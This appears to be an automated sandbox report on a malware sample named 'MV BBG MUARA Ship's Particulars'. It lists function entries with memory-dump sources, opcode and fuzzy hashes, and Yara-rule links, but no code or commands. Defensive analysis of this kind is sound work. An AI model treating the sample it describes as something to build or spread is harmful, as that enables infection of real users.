                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 433170b1b726ea2345e928f4b013a474716d57a4e8ab3d3723a847b854ea83a7
                                                                                                                  • Instruction ID: 819bb1737a796dea9b378d5791554bdc555814d444cc87b0c926cddf10b1bc40
                                                                                                                  • Opcode Fuzzy Hash: 433170b1b726ea2345e928f4b013a474716d57a4e8ab3d3723a847b854ea83a7
                                                                                                                  • Instruction Fuzzy Hash: DE813D34B0020A8FDF44DFA8D59469EB7F6AF89700F248529D40AEF799EB30DC468B51
                                                                                                                  Function 069145C4 Relevance: .2, Instructions: 219COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1f35eddf63c42ade76e9d9750b223b191378e6b23ae9e7a1b032718f1e64c765
                                                                                                                  • Instruction ID: 4a0c6fffe65bdc99318b2d350601f9edd7382d2573bb3cc1b1387a8316cdb56f
                                                                                                                  • Opcode Fuzzy Hash: 1f35eddf63c42ade76e9d9750b223b191378e6b23ae9e7a1b032718f1e64c765
                                                                                                                  • Instruction Fuzzy Hash: CA914D74E002198BDF60DF68C890B9DB7B1FF89310F208699D549AB395DB70AA85CF91
                                                                                                                  Function 069145D8 Relevance: .2, Instructions: 210COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e89e0e574d2c58000c05b49ca4e3117dfbc44aa57eaa06998446121d9a831e89
                                                                                                                  • Instruction ID: f80a6fde31633b18f8a10a54db927e9351e52006a0a2abbc19b8b1cf69a53233
                                                                                                                  • Opcode Fuzzy Hash: e89e0e574d2c58000c05b49ca4e3117dfbc44aa57eaa06998446121d9a831e89
                                                                                                                  • Instruction Fuzzy Hash: 34915D74E106198BDF60DF68C880B9DB7B1FF89310F208699D549BB395DB70AA85CF90
                                                                                                                  Function 0691FBB8 Relevance: .2, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f8e7a4bda062c90090c216c324b8d1e266d2e74ff618a603343d2011b5eddeca
                                                                                                                  • Instruction ID: 662bbf9f324579349391a09512210a5454475ba5bebff9953ed97341a900ed41
                                                                                                                  • Opcode Fuzzy Hash: f8e7a4bda062c90090c216c324b8d1e266d2e74ff618a603343d2011b5eddeca
                                                                                                                  • Instruction Fuzzy Hash: 0461BF31E0010DDFDF54AB78E8942AEBBF6EB84311F30486AE506DB655DB358955CB80
                                                                                                                  Function 0691EB1A Relevance: .2, Instructions: 202COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c78b92cd54e487cb5c4d089b4970563ca2c4a0fbb02a0ac7b51f75cc64cd227e
                                                                                                                  • Instruction ID: ff03f686d045b922f52b96c3cfac2f1e76858c203e4d4547155d6b3667856ded
                                                                                                                  • Opcode Fuzzy Hash: c78b92cd54e487cb5c4d089b4970563ca2c4a0fbb02a0ac7b51f75cc64cd227e
                                                                                                                  • Instruction Fuzzy Hash: 9A712B74B002099FDB54DFA9D980A9EBBF6EF88300F248429E415EB755DB30ED46CB50
                                                                                                                  Function 0691EB28 Relevance: .2, Instructions: 201COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a7f69ad6502cbceb7da0f9ba0e14f594fe3331d104ac8de4d85ae620392721a7
                                                                                                                  • Instruction ID: a78d0de4eb53fcdbaf9e208be68b5aaab2383c4a725a8c07ac273ed1397fd5a4
                                                                                                                  • Opcode Fuzzy Hash: a7f69ad6502cbceb7da0f9ba0e14f594fe3331d104ac8de4d85ae620392721a7
                                                                                                                  • Instruction Fuzzy Hash: 44711974B002099FDB54EFA9D980A9EBBF6EF88300F248429E405EB755DB30ED46CB50
                                                                                                                  Function 0691F968 Relevance: .2, Instructions: 169COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0af3c98d2c5c626598d2e6b7ec7081475f264fc187345fa2b1b82f6b916b4c55
                                                                                                                  • Instruction ID: b4ef254817ff4f9f6768f4e90e66403aaafaf62a2354a0aca58d418401a8a85b
                                                                                                                  • Opcode Fuzzy Hash: 0af3c98d2c5c626598d2e6b7ec7081475f264fc187345fa2b1b82f6b916b4c55
                                                                                                                  • Instruction Fuzzy Hash: BE516574F2021C9BEFA466FCD8A476F269ED789310F304426D24ACB7D5DA6CCC4197A2
                                                                                                                  Function 0691F978 Relevance: .2, Instructions: 163COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 258753bcb70b25f10496aec8303fb575235c945307c548f47bddc05bb450e3d6
                                                                                                                  • Instruction ID: 4ed47bd8ee85bac2edb89d85c76d6e77547433cb2f2d5d4941399795423dd44b
                                                                                                                  • Opcode Fuzzy Hash: 258753bcb70b25f10496aec8303fb575235c945307c548f47bddc05bb450e3d6
                                                                                                                  • Instruction Fuzzy Hash: 17515374F2021C9BEFA466FCD89476F269ED789350F304426E20ACB795DE6CCC4157A2
                                                                                                                  Function 06915419 Relevance: .1, Instructions: 130COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 33ed3f4e0fe7f843bbe5b0f8ce067068a9a83502beb77e2160da6839f823e87c
                                                                                                                  • Instruction ID: 201f2cebd7656acce399c8b1b6001010bad327eb8134e2f9526df4fbb0409a9d
                                                                                                                  • Opcode Fuzzy Hash: 33ed3f4e0fe7f843bbe5b0f8ce067068a9a83502beb77e2160da6839f823e87c
                                                                                                                  • Instruction Fuzzy Hash: AA4131B1E006099FDF70CE99D8C0AAFF7B6FB84310F21492AE116DB650D731E9558B91
                                                                                                                  Function 0691D970 Relevance: .1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7a3ae21f8311f15047f3aa636824e7d71a937f6c6d2f49ab9f949a811a4b4ab9
                                                                                                                  • Instruction ID: de8f18b869335676a2edc9a6d0965abc3e19d452e65dfc7db844ff82709ecdc0
                                                                                                                  • Opcode Fuzzy Hash: 7a3ae21f8311f15047f3aa636824e7d71a937f6c6d2f49ab9f949a811a4b4ab9
                                                                                                                  • Instruction Fuzzy Hash: A331A570E1034A9FDF15DF68C99069EBBB5EF85314F208929E805EF745EB70A946CB80
                                                                                                                  Function 06912079 Relevance: .1, Instructions: 94COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 52f5b63460a8f7d76fefeb1817a9f8e9897c4faf369aa7320b81f61606f32903
                                                                                                                  • Instruction ID: 7a1f4951c09f3c74109868b59dd7d00c309ef33fbf39b87eb230a2b57a4b9c81
                                                                                                                  • Opcode Fuzzy Hash: 52f5b63460a8f7d76fefeb1817a9f8e9897c4faf369aa7320b81f61606f32903
                                                                                                                  • Instruction Fuzzy Hash: DA318030E102099FCB15DF68D99469EB7B6FF89300F20C529E906EB754DB71AD86CB90
                                                                                                                  Function 06912088 Relevance: .1, Instructions: 91COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bf70ccf01f41b703621f035d1686f1ead677646bd1dad38d3b3c3d90071b4537
                                                                                                                  • Instruction ID: 0c4de203181aa6f5772b36efb248ba791ddfa36ee95d4ad73e7f9ada6d7d2bc2
                                                                                                                  • Opcode Fuzzy Hash: bf70ccf01f41b703621f035d1686f1ead677646bd1dad38d3b3c3d90071b4537
                                                                                                                  • Instruction Fuzzy Hash: D7316130E102099FCB15DF68D89469EB7B6FF89300F20C529E906EB754DB71AD86CB90
                                                                                                                  Function 06913AB0 Relevance: .1, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 105c66b9f42709406fce21033c880cf391c75f718b365002e6336ed2b8473596
                                                                                                                  • Instruction ID: 057b1e773d67e270200f162cb807804b2dff4f72628ed6146e56f1ca294f02e2
                                                                                                                  • Opcode Fuzzy Hash: 105c66b9f42709406fce21033c880cf391c75f718b365002e6336ed2b8473596
                                                                                                                  • Instruction Fuzzy Hash: F0218976F406199FDB40DFA9D980AAEBBF5EB48710F248429E905EB395E730DC008B90
                                                                                                                  Function 06913AAE Relevance: .1, Instructions: 74COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfcb67df7ca1b26b455c3d0b3df6f76667e9f340764f6934795950e3a42a9fa5
                                                                                                                  • Instruction ID: 45968c45575337ffe74ff7672d2b6dc44c2190fbf5d6b5c465b105f95e66049d
                                                                                                                  • Opcode Fuzzy Hash: cfcb67df7ca1b26b455c3d0b3df6f76667e9f340764f6934795950e3a42a9fa5
                                                                                                                  • Instruction Fuzzy Hash: 25217C76F006199FDB40DFB9D980BAEB7F5AB48710F248425E915EB395E730D9018B90
                                                                                                                  Function 00F7D005 Relevance: .1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4187309392.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_f7d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c776ede5b8ae2cc2c7204f9b066d9a3e87e3d5c96569e7d156606acdba03eb22
                                                                                                                  • Instruction ID: c3bb565a1322711f66fb9001da115a108974df13b64eaaade1ce7477bfb12c9e
                                                                                                                  • Opcode Fuzzy Hash: c776ede5b8ae2cc2c7204f9b066d9a3e87e3d5c96569e7d156606acdba03eb22
                                                                                                                  • Instruction Fuzzy Hash: B1215E7150D3C09FC703CB24D994711BF71AF46224F29C5EBD8898F2A7C23A984ACB62
                                                                                                                  Function 00F7D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4187309392.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_f7d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5cbcdc847318837339a49cb44c6ceef623df78d9f52d55f48137535f527d465a
                                                                                                                  • Instruction ID: f6a63a401a91a6d61b6c84ebd3944731d80622eaa68a0dbae2a0d92fc5f8f98f
                                                                                                                  • Opcode Fuzzy Hash: 5cbcdc847318837339a49cb44c6ceef623df78d9f52d55f48137535f527d465a
                                                                                                                  • Instruction Fuzzy Hash: A721D3B1504204DFDB14DF14D9C0B26BBB5FF84324F64C56AD94E4A25AC336D846EA62
                                                                                                                  Function 06913BC0 Relevance: .1, Instructions: 59COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 156ea2baadf8e7f720a2176595e01a05dc08b29be02a79e7fdce3bed6b588838
                                                                                                                  • Instruction ID: b2be67262b94a146492e849764d62a6c53d673c4831fce2a20a38a2192ec0eeb
                                                                                                                  • Opcode Fuzzy Hash: 156ea2baadf8e7f720a2176595e01a05dc08b29be02a79e7fdce3bed6b588838
                                                                                                                  • Instruction Fuzzy Hash: 7D11A136B045294FDF549A6CD9506AE73FAABC8310F108539C806EB358EF34DC028B90
                                                                                                                  Function 06914200 Relevance: .1, Instructions: 56COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 922abf72b6dbf7cddd6fcbb66b03e0f03989dd9bb858f440a659cb8a0871a594
                                                                                                                  • Instruction ID: 1fca119b064a0b077fbf64f8cf3327684de7775c4aa3d0e4360022e81e61fb49
                                                                                                                  • Opcode Fuzzy Hash: 922abf72b6dbf7cddd6fcbb66b03e0f03989dd9bb858f440a659cb8a0871a594
                                                                                                                  • Instruction Fuzzy Hash: AC019E31B001141BDB6196BD9844B1FB7DBDBC9B14F388829E10ADB745E965DC8243A2
                                                                                                                  Function 0691A311 Relevance: .1, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: edca57857c4e7dee27148df558bf9407cb6fba481c5ffec83f956c7c406fe2f1
                                                                                                                  • Instruction ID: 8fe944d68b343b0e2ac09cecc9adff1d20d3c0ac8386282c30df6bca89c93211
                                                                                                                  • Opcode Fuzzy Hash: edca57857c4e7dee27148df558bf9407cb6fba481c5ffec83f956c7c406fe2f1
                                                                                                                  • Instruction Fuzzy Hash: 8C01F5307012450FCB139A78985471EBBE9EB8B650F20486EE18ACB351DA25DC038381
                                                                                                                  Function 06913878 Relevance: .1, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c1bfbeac49dbd2633d85600d9a69fe8d3f375bb00f66e53f77811fc12f92bb7f
                                                                                                                  • Instruction ID: 813d2677def61c2453aeaa969defe579b9117ae9071b65b8906f9652d8f53e95
                                                                                                                  • Opcode Fuzzy Hash: c1bfbeac49dbd2633d85600d9a69fe8d3f375bb00f66e53f77811fc12f92bb7f
                                                                                                                  • Instruction Fuzzy Hash: CE21F4B1D00259AFCB10CF9AD985ADEFFB8FB48310F10812AE918A7600C375A550CFA5
                                                                                                                  Function 0691ED99 Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 079845174994d7e1cb4eb52f9e5ba0e4f656ff28a6692645261c288abadaa72b
                                                                                                                  • Instruction ID: 0f97a4ce7f2124276285a8db0e39d6a8710b1fe8690c02fcda3d6d46b98c011b
                                                                                                                  • Opcode Fuzzy Hash: 079845174994d7e1cb4eb52f9e5ba0e4f656ff28a6692645261c288abadaa72b
                                                                                                                  • Instruction Fuzzy Hash: C9018435B000155FCB55DA7CD450B3BB7EADBC9620F24893EE50ACB341DD61DD428791
                                                                                                                  Function 06913BAF Relevance: .1, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 97a61b74379d09a70ab5d0d44f78383e73b9635c1af5152b3bc3fb9fbe31a145
                                                                                                                  • Instruction ID: 148dd4ec33ee801a98fafc3c6fba87cecb31a0c9afc37c24ed0658b01669b656
                                                                                                                  • Opcode Fuzzy Hash: 97a61b74379d09a70ab5d0d44f78383e73b9635c1af5152b3bc3fb9fbe31a145
                                                                                                                  • Instruction Fuzzy Hash: F701B132B141195FDF549A6DA8102AF77FB9BC9210F24453AD80ADB248FB20CC0247D1
                                                                                                                  Function 06913880 Relevance: .1, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3243045c4873a9a5ea52314b7645d019ba13874d2becd5924d3f080b8a590a59
                                                                                                                  • Instruction ID: d6c5e23c8763c4cdbc65bf2e4c8ba378553951efa2fb8405e645aef072633e6e
                                                                                                                  • Opcode Fuzzy Hash: 3243045c4873a9a5ea52314b7645d019ba13874d2becd5924d3f080b8a590a59
                                                                                                                  • Instruction Fuzzy Hash: 8B11C2B1D00259AFCB10CF9AD985ACEFFB8FB48310F20812AE918A7200C374A554CFA5
                                                                                                                  Function 06914210 Relevance: .1, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 51d67c4405429439e99b9461b4e0ed3a9801a58807f6f8d97666f29541427c4e
                                                                                                                  • Instruction ID: 04303875e2905c8c1a27d449168fe3ec771fc95a9efae3cc486e47fcc8e86e8d
                                                                                                                  • Opcode Fuzzy Hash: 51d67c4405429439e99b9461b4e0ed3a9801a58807f6f8d97666f29541427c4e
                                                                                                                  • Instruction Fuzzy Hash: F9016D31B001141BDB6596ADD454B2FB3DEEBC9B20F348839E50ADB744DD65DC834391
                                                                                                                  Function 0691EDA8 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9d5bc98b91f538391facf771eeea4ed4cc1120268cf8299aac2f182a0686b57d
                                                                                                                  • Instruction ID: bc625609c61f1a28a6fdd1f6c3b584622b486fb3f58ef2934fbabe732e6ea201
                                                                                                                  • Opcode Fuzzy Hash: 9d5bc98b91f538391facf771eeea4ed4cc1120268cf8299aac2f182a0686b57d
                                                                                                                  • Instruction Fuzzy Hash: 2F018C35B100195BDB65967CA45073F73EADBC9620F34883AEA0ACB340EE65DD024381
                                                                                                                  Function 0691A320 Relevance: .0, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4291127f9b1b3d35f55f617421350aa4608b7b4d2079ee57013ea598725f44f8
                                                                                                                  • Instruction ID: b1cebdbe681051c8eb9abbeb955b358ae07f98394886ea699e104681a630dbce
                                                                                                                  • Opcode Fuzzy Hash: 4291127f9b1b3d35f55f617421350aa4608b7b4d2079ee57013ea598725f44f8
                                                                                                                  • Instruction Fuzzy Hash: 2A01A435B001185FCB52DABCD55471E73EAEB8A760F708829E10ACB754DE21DD038381
                                                                                                                  Function 06916470 Relevance: .0, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e12ead7efe305b0c7768bc0008e52f7354f2a3483e1765a4375e71872d684c4c
                                                                                                                  • Instruction ID: c100164af45b4ee4d10705fc7358d03329e378f95438c42368eefef7c335b91a
                                                                                                                  • Opcode Fuzzy Hash: e12ead7efe305b0c7768bc0008e52f7354f2a3483e1765a4375e71872d684c4c
                                                                                                                  • Instruction Fuzzy Hash: AAE0D871E1524C5FDF50DEB08D6479A7B6E9B46204F3088E9D445CF582D532CA018340

                                                                                                                  Non-executed Functions

                                                                                                                  Function 069176A0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-1462074617
                                                                                                                  • Opcode ID: 300b79e05ad90bda8e9bf3422f9688ca35216e02cd1fb6f486b31db6da2d5c23
                                                                                                                  • Instruction ID: 277af223e71687cb9c8c0a29f1cc1a4c853728faf632ed610b009dd002eb7235
                                                                                                                  • Opcode Fuzzy Hash: 300b79e05ad90bda8e9bf3422f9688ca35216e02cd1fb6f486b31db6da2d5c23
                                                                                                                  • Instruction Fuzzy Hash: 07122E74F0021A8FDB64DFA8C99469EB7B6BF88300F208569D40AAF755DB309D85CF90
                                                                                                                  Function 0691A948 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
